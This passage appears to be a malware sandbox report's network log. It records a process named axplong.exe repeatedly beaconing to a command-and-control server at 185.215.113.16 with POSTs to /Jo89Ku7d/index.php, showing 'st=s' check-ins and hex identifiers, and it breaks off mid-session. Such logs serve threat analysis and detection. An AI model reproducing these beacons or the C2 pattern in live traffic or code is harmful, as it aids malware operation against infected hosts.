                                                                                                                                                                46192.168.2.449850185.215.113.16802304C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Sep 27, 2024 17:42:58.386059999 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                Sep 27, 2024 17:42:59.085181952 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:58 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 1 0
                                                                                                                                                                Sep 27, 2024 17:42:59.086059093 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 154
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                                                                                Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                                                                                Sep 27, 2024 17:42:59.314188004 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:59 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                47192.168.2.449853185.215.113.16802304C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Sep 27, 2024 17:42:59.436224937 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                Sep 27, 2024 17:43:00.127280951 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:43:00 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 1 0
                                                                                                                                                                Sep 27, 2024 17:43:00.128468990 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 154
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                                                                                Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                                                                                Sep 27, 2024 17:43:00.351398945 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:43:00 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                48192.168.2.449856185.215.113.16802304C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Sep 27, 2024 17:43:00.465286016 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                Sep 27, 2024 17:43:01.174545050 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:43:01 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 1 0
                                                                                                                                                                Sep 27, 2024 17:43:01.175760031 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 154
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                                                                                Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                                                                                Sep 27, 2024 17:43:01.408756018 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:43:01 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                49192.168.2.449858185.215.113.16802304C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Sep 27, 2024 17:43:01.526613951 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                Sep 27, 2024 17:43:02.382951975 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:43:02 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 1 0
                                                                                                                                                                Sep 27, 2024 17:43:02.419157028 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 154
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                                                                                Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                                                                                Sep 27, 2024 17:43:02.679337978 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:43:02 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                50192.168.2.449860185.215.113.16802304C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Sep 27, 2024 17:43:02.810136080 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                Sep 27, 2024 17:43:03.525504112 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:43:03 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 1 0
                                                                                                                                                                Sep 27, 2024 17:43:03.527072906 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 154
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                                                                                Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                                                                                Sep 27, 2024 17:43:03.779948950 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:43:03 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                51192.168.2.449863185.215.113.16802304C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Sep 27, 2024 17:43:03.909044981 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                Sep 27, 2024 17:43:04.634247065 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:43:04 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 1 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                52192.168.2.449865185.215.113.16802304C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Sep 27, 2024 17:43:04.644211054 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 154
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                                                                                Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                                                                                Sep 27, 2024 17:43:05.362236977 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:43:05 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                53192.168.2.449866185.215.113.16802304C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Sep 27, 2024 17:43:05.498855114 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                Sep 27, 2024 17:43:06.245016098 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:43:06 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 1 0
                                                                                                                                                                Sep 27, 2024 17:43:06.278886080 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 154
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                                                                                Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                                                                                Sep 27, 2024 17:43:06.515132904 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:43:06 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                54192.168.2.449868185.215.113.16802304C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Sep 27, 2024 17:43:06.659894943 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                Sep 27, 2024 17:43:07.374871016 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:43:07 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 1 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                55192.168.2.449870185.215.113.16802304C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Sep 27, 2024 17:43:07.387698889 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 154
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                                                                                Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                                                                                Sep 27, 2024 17:43:08.150934935 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:43:08 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                56192.168.2.449871185.215.113.16802304C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Sep 27, 2024 17:43:08.273228884 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                Sep 27, 2024 17:43:08.984005928 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:43:08 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 1 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                57192.168.2.449873185.215.113.16802304C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Sep 27, 2024 17:43:08.993453979 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 154
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                                                                                Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                                                                                Sep 27, 2024 17:43:09.713608027 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:43:09 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                58192.168.2.449874185.215.113.1680
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Sep 27, 2024 17:43:09.825216055 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                Sep 27, 2024 17:43:10.564949989 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:43:10 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 1 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                59192.168.2.449875185.215.113.1680
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Sep 27, 2024 17:43:10.574079037 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                Content-Length: 154
                                                                                                                                                                Cache-Control: no-cache
